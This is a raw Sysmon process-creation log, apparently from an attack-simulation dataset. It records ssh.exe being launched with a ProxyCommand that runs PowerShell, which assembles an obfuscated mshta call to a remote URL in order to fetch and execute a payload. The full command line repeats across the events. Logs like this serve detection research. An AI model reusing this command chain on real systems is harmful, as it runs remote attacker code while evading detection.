154100x80000000000000005693688Microsoft-Windows-Sysmon/Operationalar-win-3-2025-03-24 16:49:54.526{e8747bb8-8d32-67e1-ad66-000000004103}3588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell powershell -C 'mshta'.Insert(5,' https://cyberden.ng/default.mp4')C:\Users\Administrator\Desktop\AR-WIN-3\Administrator{e8747bb8-6cb6-67e1-29a5-040700000000}0x704a5292HighMD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C{e8747bb8-8d31-67e1-ab66-000000004103}6076C:\Windows\System32\OpenSSH\ssh.exe"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://cyberden.ng/default.mp4')" .AR-WIN-3\Administrator 154100x80000000000000005693410Microsoft-Windows-Sysmon/Operationalar-win-3-2025-03-24 16:49:54.006{e8747bb8-8d32-67e1-ac66-000000004103}500C:\Windows\System32\conhost.exe10.0.17763.4840 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsAR-WIN-3\Administrator{e8747bb8-6cb6-67e1-29a5-040700000000}0x704a5292HighMD5=C15E2496B1ECA76F4B09B109DAB10FC3,SHA256=AC68880B09834F3F1B12EEA5966F42AD695711E04C34A577596C1578997F90E8{e8747bb8-8d31-67e1-ab66-000000004103}6076C:\Windows\System32\OpenSSH\ssh.exe"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://cyberden.ng/default.mp4')" .AR-WIN-3\Administrator 154100x80000000000000005693377Microsoft-Windows-Sysmon/Operationalar-win-3-2025-03-24 16:49:53.961{e8747bb8-8d31-67e1-ab66-000000004103}6076C:\Windows\System32\OpenSSH\ssh.exe9.5.2.1-OpenSSH for Windows--"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://cyberden.ng/default.mp4')" .C:\Users\Administrator\Desktop\AR-WIN-3\Administrator{e8747bb8-6cb6-67e1-29a5-040700000000}0x704a5292HighMD5=543FB58AA3B9120623A46DD6503F4688,SHA256=B235AA64234D7E5BF7159B2744E05A04D7AA6EDD54A7678E488809299F776BFC{e8747bb8-6cb9-67e1-2463-000000004103}5368C:\Windows\explorer.exeC:\Windows\Explorer.EXEAR-WIN-3\Administrator